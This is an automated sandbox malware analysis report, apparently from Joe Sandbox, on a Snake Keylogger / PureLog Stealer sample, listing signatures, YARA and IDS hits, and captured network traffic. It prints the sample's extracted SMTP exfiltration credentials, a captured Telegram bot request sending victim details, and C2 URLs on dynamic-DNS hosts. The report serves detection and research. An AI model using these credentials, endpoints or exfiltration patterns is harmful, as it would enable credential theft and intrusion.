
Windows Analysis Report
kP8EgMorTr.exe

Overview

General Information

Sample name: kP8EgMorTr.exe (renamed because original name is a hash value)
Original sample name: 6889d04a51c7a76b2ab1b4161b2b5e5d17dc2780e29dcc78b41460f982986786.exe
Analysis ID: 1584668
MD5: 8a51bda9c0cd3d8519c1156dfa39426b
SHA1: bf1e7be7d44cf1f7499ee43d35aad3d9f8684b28
SHA256: 6889d04a51c7a76b2ab1b4161b2b5e5d17dc2780e29dcc78b41460f982986786
Tags: exe, SnakeKeylogger, user-zhuzhu0009

Detection

Detected families: PureLog Stealer, Snake Keylogger, VIP Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected PureLog Stealer
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Machine Learning detection for sample
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • kP8EgMorTr.exe (PID: 7276 cmdline: "C:\Users\user\Desktop\kP8EgMorTr.exe" MD5: 8A51BDA9C0CD3D8519C1156DFA39426B)
    • kP8EgMorTr.exe (PID: 7432 cmdline: "C:\Users\user\Desktop\kP8EgMorTr.exe" MD5: 8A51BDA9C0CD3D8519C1156DFA39426B)
  • cleanup
Name | Description | Attribution | Blogpost URLs | Link
404 Keylogger, Snake Keylogger | Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram. | No Attribution | | https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "SMTP", "Email ID": "logistics@aruzen.co.in", "Password": "Pawsad-xovwut-2zoxso", "Host": "mail.aruzen.co.in", "Port": "587"}
{"Exfil Mode": "SMTP", "Username": "logistics@aruzen.co.in", "Password": "Pawsad-xovwut-2zoxso", "Host": "mail.aruzen.co.in", "Port": "587", "Version": "4.4"}
Source | Rule | Description | Author | Strings
00000000.00000002.1254420339.00000000052D0000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
00000003.00000002.3697868899.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000003.00000002.3697868899.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_VIPKeylogger | Yara detected VIP Keylogger | Joe Security |
00000003.00000002.3697868899.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security |
00000003.00000002.3697868899.0000000000402000.00000040.00000400.00020000.00000000.sdmp | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown | strings:
  • 0x2d703:$a1: get_encryptedPassword
  • 0x2da20:$a2: get_encryptedUsername
  • 0x2d513:$a3: get_timePasswordChanged
  • 0x2d61c:$a4: get_passwordField
  • 0x2d719:$a5: set_encryptedPassword
  • 0x2edda:$a7: get_logins
  • 0x2ed3d:$a10: KeyLoggerEventArgs
  • 0x2e9a2:$a11: KeyLoggerEventArgsEventHandler
Source | Rule | Description | Author | Strings
0.2.kP8EgMorTr.exe.52d0000.3.raw.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
0.2.kP8EgMorTr.exe.52d0000.3.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
0.2.kP8EgMorTr.exe.3896ef8.0.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
0.2.kP8EgMorTr.exe.3896ef8.0.unpack | JoeSecurity_VIPKeylogger | Yara detected VIP Keylogger | Joe Security |
0.2.kP8EgMorTr.exe.3896ef8.0.unpack | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security |

No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-06T07:41:11.372807+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.7 | 49706 | 188.114.97.3 | 443 | TCP
2025-01-06T07:41:25.823569+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.7 | 49784 | 188.114.97.3 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-06T07:41:07.750465+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.7 | 49701 | 132.226.8.169 | 80 | TCP
2025-01-06T07:41:10.813013+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.7 | 49701 | 132.226.8.169 | 80 | TCP
2025-01-06T07:41:14.219249+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.7 | 49707 | 132.226.8.169 | 80 | TCP
2025-01-06T07:41:15.625492+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.7 | 49709 | 132.226.8.169 | 80 | TCP
2025-01-06T07:41:19.984901+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.7 | 49717 | 132.226.8.169 | 80 | TCP
2025-01-06T07:41:20.969278+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.7 | 49741 | 132.226.8.169 | 80 | TCP
2025-01-06T07:41:22.422409+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.7 | 49753 | 132.226.8.169 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-06T07:41:26.698067+0100 | 1810007 | 1 | Potentially Bad Traffic | 192.168.2.7 | 49790 | 149.154.167.220 | 443 | TCP

AV Detection

Source: 00000000.00000002.1249756112.0000000003729000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "logistics@aruzen.co.in", "Password": "Pawsad-xovwut-2zoxso", "Host": "mail.aruzen.co.in", "Port": "587", "Version": "4.4"}
Source: 0.2.kP8EgMorTr.exe.3896ef8.0.unpack | Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "logistics@aruzen.co.in", "Password": "Pawsad-xovwut-2zoxso", "Host": "mail.aruzen.co.in", "Port": "587"}
Source: kP8EgMorTr.exe | Virustotal: Detection: 36%
Source: kP8EgMorTr.exe | ReversingLabs: Detection: 39%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: kP8EgMorTr.exe | Joe Sandbox ML: detected

Location Tracking

Source: unknown | DNS query: name: reallyfreegeoip.org
Source: kP8EgMorTr.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49703 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49790 version: TLS 1.2
Source: kP8EgMorTr.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\kP8EgMorTr.exe | Code function: 4x nop then jmp 031CF2EDh | 3_2_031CF33C
Source: C:\Users\user\Desktop\kP8EgMorTr.exe | Code function: 4x nop then jmp 031CF2EDh | 3_2_031CF150
Source: C:\Users\user\Desktop\kP8EgMorTr.exe | Code function: 4x nop then jmp 031CFAA9h | 3_2_031CF7F1
Source: C:\Users\user\Desktop\kP8EgMorTr.exe | Code function: 4x nop then jmp 05E931E8h | 3_2_05E92DCA
Source: C:\Users\user\Desktop\kP8EgMorTr.exe | Code function: 4x nop then jmp 05E931E8h | 3_2_05E92DD0
Source: C:\Users\user\Desktop\kP8EgMorTr.exe | Code function: 4x nop then jmp 05E9F019h | 3_2_05E9ED70
Source: C:\Users\user\Desktop\kP8EgMorTr.exe | Code function: 4x nop then jmp 05E9E769h | 3_2_05E9E4C0
Source: C:\Users\user\Desktop\kP8EgMorTr.exe | Code function: 4x nop then jmp 05E9DEB9h | 3_2_05E9DC10
Source: C:\Users\user\Desktop\kP8EgMorTr.exe | Code function: 4x nop then jmp 05E9DA61h | 3_2_05E9D7B8
Source: C:\Users\user\Desktop\kP8EgMorTr.exe | Code function: 4x nop then jmp 05E9D1B1h | 3_2_05E9CF08
Source: C:\Users\user\Desktop\kP8EgMorTr.exe | Code function: 4x nop then jmp 05E9F8C9h | 3_2_05E9F620
Source: C:\Users\user\Desktop\kP8EgMorTr.exe | Code function: 4x nop then jmp 05E9F471h | 3_2_05E9F1C8
Source: C:\Users\user\Desktop\kP8EgMorTr.exe | Code function: 4x nop then jmp 05E92C21h | 3_2_05E92970
Source: C:\Users\user\Desktop\kP8EgMorTr.exe | Code function: 4x nop then jmp 05E9EBC1h | 3_2_05E9E918
Source: C:\Users\user\Desktop\kP8EgMorTr.exe | Code function: 4x nop then jmp 05E931E8h | 3_2_05E93116
Source: C:\Users\user\Desktop\kP8EgMorTr.exe | Code function: 4x nop then jmp 05E9E311h | 3_2_05E9E068
Source: C:\Users\user\Desktop\kP8EgMorTr.exe | Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h | 3_2_05E90040
Source: C:\Users\user\Desktop\kP8EgMorTr.exe | Code function: 4x nop then jmp 05E9D609h | 3_2_05E9D360
Source: C:\Users\user\Desktop\kP8EgMorTr.exe | Code function: 4x nop then jmp 05E90D0Dh | 3_2_05E90B30
Source: C:\Users\user\Desktop\kP8EgMorTr.exe | Code function: 4x nop then jmp 05E91697h | 3_2_05E90B30
Source: C:\Users\user\Desktop\kP8EgMorTr.exe | Code function: 4x nop then jmp 05E9FD21h | 3_2_05E9FA78

Networking

Source: Network traffic | Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.7:49790 -> 149.154.167.220:443
Source: unknown | DNS query: name: api.telegram.org
Source: Yara match | File source: 3.2.kP8EgMorTr.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.kP8EgMorTr.exe.3896ef8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.kP8EgMorTr.exe.380fad8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.kP8EgMorTr.exe.3729970.1.raw.unpack, type: UNPACKEDPE
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:927537%0D%0ADate%20and%20Time:%2006/01/2025%20/%2020:38:20%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20927537%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 | Host: api.telegram.org | Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 132.226.8.169 132.226.8.169
Source: Joe Sandbox View | JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown | DNS query: name: checkip.dyndns.org
Source: unknown | DNS query: name: reallyfreegeoip.org
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49741 -> 132.226.8.169:80
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49709 -> 132.226.8.169:80
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49753 -> 132.226.8.169:80
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49717 -> 132.226.8.169:80
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49707 -> 132.226.8.169:80
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49701 -> 132.226.8.169:80
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49706 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49784 -> 188.114.97.3:443
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49703 version: TLS 1.0
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:927537%0D%0ADate%20and%20Time:%2006/01/2025%20/%2020:38:20%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20927537%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 | Host: api.telegram.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic | DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic | DNS traffic detected: DNS query: api.telegram.org
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 | Date: Mon, 06 Jan 2025 06:41:26 GMT | Content-Type: application/json | Content-Length: 55 | Connection: close | Strict-Transport-Security: max-age=31536000; includeSubDomains; preload | Access-Control-Allow-Origin: * | Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: kP8EgMorTr.exe, 00000000.00000002.1249756112.0000000003729000.00000004.00000800.00020000.00000000.sdmp, kP8EgMorTr.exe, 00000003.00000002.3697868899.0000000000402000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: kP8EgMorTr.exe, 00000000.00000002.1249756112.0000000003729000.00000004.00000800.00020000.00000000.sdmp, kP8EgMorTr.exe, 00000003.00000002.3697868899.0000000000402000.00000040.00000400.00020000.00000000.sdmp, kP8EgMorTr.exe, 00000003.00000002.3699670660.00000000032F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://aborters.duckdns.org:8081
Source: kP8EgMorTr.exe, 00000000.00000002.1249756112.0000000003729000.00000004.00000800.00020000.00000000.sdmp, kP8EgMorTr.exe, 00000003.00000002.3697868899.0000000000402000.00000040.00000400.00020000.00000000.sdmp, kP8EgMorTr.exe, 00000003.00000002.3699670660.00000000032F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://anotherarmy.dns.army:8081
Source: kP8EgMorTr.exe, 00000003.00000002.3699670660.00000000032F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org
Source: kP8EgMorTr.exe, 00000003.00000002.3699670660.00000000032F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/
Source: kP8EgMorTr.exe, 00000000.00000002.1249756112.0000000003729000.00000004.00000800.00020000.00000000.sdmp, kP8EgMorTr.exe, 00000003.00000002.3697868899.0000000000402000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/q
Source: kP8EgMorTr.exe, 00000003.00000002.3699670660.00000000032F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: kP8EgMorTr.exe, 00000000.00000002.1249756112.0000000003729000.00000004.00000800.00020000.00000000.sdmp, kP8EgMorTr.exe, 00000003.00000002.3697868899.0000000000402000.00000040.00000400.00020000.00000000.sdmp, kP8EgMorTr.exe, 00000003.00000002.3699670660.00000000032F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://varders.kozow.com:8081
Source: kP8EgMorTr.exe | String found in binary or memory: http://www.omdbapi.com/?t=)&y=&plot=long&r=json
Source: kP8EgMorTr.exe, 00000003.00000002.3702114001.0000000004311000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: kP8EgMorTr.exe, 00000003.00000002.3699670660.00000000033DA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org
Source: kP8EgMorTr.exe, 00000000.00000002.1249756112.0000000003729000.00000004.00000800.00020000.00000000.sdmp, kP8EgMorTr.exe, 00000003.00000002.3699670660.00000000033DA000.00000004.00000800.00020000.00000000.sdmp, kP8EgMorTr.exe, 00000003.00000002.3697868899.0000000000402000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot
Source: kP8EgMorTr.exe, 00000003.00000002.3699670660.00000000033DA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: kP8EgMorTr.exe, 00000003.00000002.3699670660.00000000033DA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:927537%0D%0ADate%20a
Source: kP8EgMorTr.exe, 00000003.00000002.3702114001.0000000004311000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: kP8EgMorTr.exe, 00000003.00000002.3702114001.0000000004311000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: kP8EgMorTr.exe, 00000003.00000002.3702114001.0000000004311000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: kP8EgMorTr.exe, 00000003.00000002.3699670660.0000000003487000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: kP8EgMorTr.exe, 00000003.00000002.3699670660.0000000003482000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: kP8EgMorTr.exe, 00000003.00000002.3702114001.0000000004311000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: kP8EgMorTr.exe, 00000003.00000002.3702114001.0000000004311000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: kP8EgMorTr.exe, 00000003.00000002.3702114001.0000000004311000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: kP8EgMorTr.exe, 00000003.00000002.3699670660.00000000033B2000.00000004.00000800.00020000.00000000.sdmp, kP8EgMorTr.exe, 00000003.00000002.3699670660.00000000033DA000.00000004.00000800.00020000.00000000.sdmp, kP8EgMorTr.exe, 00000003.00000002.3699670660.0000000003342000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org
Source: kP8EgMorTr.exe, 00000000.00000002.1249756112.0000000003729000.00000004.00000800.00020000.00000000.sdmp, kP8EgMorTr.exe, 00000003.00000002.3697868899.0000000000402000.00000040.00000400.00020000.00000000.sdmp, kP8EgMorTr.exe, 00000003.00000002.3699670660.0000000003342000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: kP8EgMorTr.exe, 00000003.00000002.3699670660.0000000003342000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
Source: kP8EgMorTr.exe, 00000003.00000002.3699670660.000000000336C000.00000004.00000800.00020000.00000000.sdmp, kP8EgMorTr.exe, 00000003.00000002.3699670660.00000000033B2000.00000004.00000800.00020000.00000000.sdmp, kP8EgMorTr.exe, 00000003.00000002.3699670660.00000000033DA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
Source: kP8EgMorTr.exe, 00000003.00000002.3702114001.0000000004311000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
Source: kP8EgMorTr.exe, 00000003.00000002.3702114001.0000000004311000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: kP8EgMorTr.exe, 00000003.00000002.3699670660.00000000034B8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.office.com/
Source: kP8EgMorTr.exe, 00000003.00000002.3699670660.00000000034B3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.office.com/lB
Source: unknown | Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown | Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown | Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown | Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown | Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown | Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown | Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49790 version: TLS 1.2

                    System Summary

                    barindex
                    Source: 0.2.kP8EgMorTr.exe.3896ef8.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
